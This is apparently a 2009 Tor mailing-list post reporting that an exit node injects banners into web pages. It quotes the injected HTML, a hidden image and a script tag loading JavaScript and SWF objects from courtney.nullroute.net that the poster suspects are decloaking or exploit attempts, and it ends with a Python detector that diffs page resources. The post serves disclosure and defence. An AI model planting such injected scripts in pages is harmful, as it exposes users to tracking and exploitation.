Banners injected in web pages at exit nodes TRHCourtney*

Freemor freemor at gmail.com
Tue Jun 2 12:20:11 UTC 2009


On Tue, 2 Jun 2009 05:36:43 -0600
John Brooks <special at dereferenced.net> wrote:

> Definitely abusive. Fortunately, because of how nearby most of the IPs
> are, Tor will treat them as family even if the operator neglected to,
> so it doesn't pose a risk to anonymity (other than the one outlying
> node, but even then it's a maximum of two), but this definitely looks
> like a badexit situation.
> 
> Honestly, why does somebody run a tor node if they keep
> connection/session logs? Seems like an odd place to look for a
> paycheck.
> 
>   - John Brooks
> 
Might be worse than that.. at least for improperly configured clients..
there does seem to be javascript injection:

<div id="floaterma9">
    <img src="http://courtney.nullroute.net/2lol.gif"
style="display:none"></img> <script type='text/javascript'
    src='http://courtney.nullroute.net/openx-2.8.1/www/delivery/spcjs.php?id=1'></script>
    <style> body {
        margin: 0 0 0 0 !important;
    }
    #Banner2 {
        width:728px;
        height:90px;
    }
    #textme {
        font-family:arial;
        color:#333;
        font-size:11px;
    }
    </style>

When I followed
http://courtney.nullroute.net/openx-2.8.1/www/delivery/spcjs.php?id=1
it had an interesting bit of code which linked to:
http://courtney.nullroute.net/openx-2.8.1/www/delivery/fl.js
Which tries to load up SWF objects..
Haven't picked it all apart yet (still no coffee) but I'm guessing it's
either decloaking attempts or exploit attempts.



-- 
freemor at gmail.com
freemor at yahoo.ca

This e-mail has been digitally signed with GnuPG - ( http://gnupg.org/ )
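
An added example, not part of the original post: one way to flag the kind of injection quoted above is to compare the remote resources in a page fetched through the exit against a copy fetched over a trusted path. The baseline page, `www.example.org`, and all function names are constructed for illustration; the injected fragment is the one quoted in the message.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tags/attributes that make a browser fetch or execute a remote resource.
RESOURCE_ATTRS = {
    "script": "src", "img": "src", "iframe": "src",
    "embed": "src", "object": "data", "link": "href",
}

class ResourceCollector(HTMLParser):
    """Collect (tag, host) pairs for every remotely loaded resource."""
    def __init__(self):
        super().__init__()
        self.resources = set()

    def handle_starttag(self, tag, attrs):
        attr = RESOURCE_ATTRS.get(tag)
        if attr is None:
            return
        url = dict(attrs).get(attr)
        # Relative URLs have no hostname and are treated as same-origin.
        host = urlparse(url).hostname if url else None
        if host:
            self.resources.add((tag, host))

def collect(html):
    parser = ResourceCollector()
    parser.feed(html)
    parser.close()
    return parser.resources

def injected_resources(trusted_html, exit_html):
    """Resources present in the exit-node copy but absent from the trusted copy."""
    return sorted(collect(exit_html) - collect(trusted_html))

# Constructed baseline (assumption: what the site serves over a trusted path).
TRUSTED = """<html><body>
<img src="http://www.example.org/logo.png">
<script src="http://www.example.org/site.js"></script>
</body></html>"""

# Same page as seen through the exit, with the fragment quoted in the post added.
EXIT = TRUSTED.replace("<body>", """<body><div id="floaterma9">
<img src="http://courtney.nullroute.net/2lol.gif" style="display:none"></img>
<script type='text/javascript'
 src='http://courtney.nullroute.net/openx-2.8.1/www/delivery/spcjs.php?id=1'></script>""")

if __name__ == "__main__":
    for tag, host in injected_resources(TRUSTED, EXIT):
        print(f"injected <{tag}> loading from {host}")
```

Pages that legitimately vary per request (rotating ad or CDN hosts) need an allow-list before the difference is meaningful.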